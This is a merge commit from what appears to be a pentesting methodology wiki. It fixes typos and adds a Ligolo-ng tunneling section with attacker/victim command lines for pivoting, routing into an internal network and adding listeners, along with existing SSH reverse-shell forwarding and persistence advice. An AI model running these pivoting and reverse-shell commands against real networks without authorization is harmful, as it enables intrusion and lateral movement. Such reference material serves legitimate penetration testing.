Merge pull request #960 from devubu/add-ligolo-ng

Add Ligolo-ng technique to tunneling-and-port-forwarding.md

Author: carlospolop

Diff for: generic-methodologies-and-resources/pentesting-methodology.md

@@ -121,7 +121,7 @@ Find here different ways to [**dump passwords in Windows**](https://github.com/c
 
 #### 11.2 - Persistence
 
-**Use 2 o 3 different types of persistence mechanism so you won't need to exploit the system again.**\
+**Use 2 or 3 different types of persistence mechanism so you won't need to exploit the system again.**\
 **Here you can find some** [**persistence tricks on active directory**](../windows-hardening/active-directory-methodology/#persistence)**.**
 
 TODO: Complete persistence Post in Windows & Linux

Diff for: generic-methodologies-and-resources/tunneling-and-port-forwarding.md

@@ -85,7 +85,7 @@ This is useful to get reverse shells from internal hosts through a DMZ to your h
 
 ```bash
 ssh -i dmz_key -R <dmz_internal_ip>:443:0.0.0.0:7000 [email protected] -vN
-# Now you can send a rev to dmz_internal_ip:443 and caputure it in localhost:7000
+# Now you can send a rev to dmz_internal_ip:443 and capture it in localhost:7000
 # Note that port 443 must be open
 # Also, remmeber to edit the /etc/ssh/sshd_config file on Ubuntu systems 
 # and change the line "GatewayPorts no" to "GatewayPorts yes"
@@ -245,6 +245,46 @@ You need to use the **same version for client and server**
 ./chisel_1.7.6_linux_amd64 client 10.10.14.20:12312 R:4505:127.0.0.1:4505 #Client -- Victim
 ```
 
+## Ligolo-ng
+
+[https://github.com/nicocha30/ligolo-ng](https://github.com/nicocha30/ligolo-ng)
+
+**Use the same version for agent and proxy**
+
+### Tunneling
+
+```bash
+# Start proxy server and automatically generate self-signed TLS certificates -- Attacker
+sudo ./proxy -selfcert
+# Create an interface named "ligolo" -- Attacker
+interface_create --name "ligolo"
+# Print the currently used certificate fingerprint -- Attacker
+certificate_fingerprint
+# Start the agent with certification validation -- Victim
+./agent -connect <ip_proxy>:11601 -v -accept-fingerprint <fingerprint>
+# Select the agent -- Attacker
+session
+1
+# Start the tunnel on the proxy server -- Attacker
+tunnel_start --tun "ligolo"
+# Display the agent's network configuration -- Attacker
+ifconfig
+# Create a route to the agent's specified network -- Attacker
+interface_add_route --name "ligolo" --route <network_address_agent>/<netmask_agent>
+# Display the tun interfaces -- Attacker
+interface_list
+```
+
+### Agent Binding and Listening
+
+```bash
+# Establish a tunnel from the proxy server to the agent
+# Create a TCP listening socket on the agent (0.0.0.0) on port 30000 and forward incoming TCP connections to the proxy (127.0.0.1) on port 10000 -- Attacker
+listener_add --addr 0.0.0.0:30000 --to 127.0.0.1:10000 --tcp
+# Display the currently running listeners on the agent -- Attacker
+listener_list
+```
+
 ## Rpivot
 
 [https://github.com/klsecservices/rpivot](https://github.com/klsecservices/rpivot)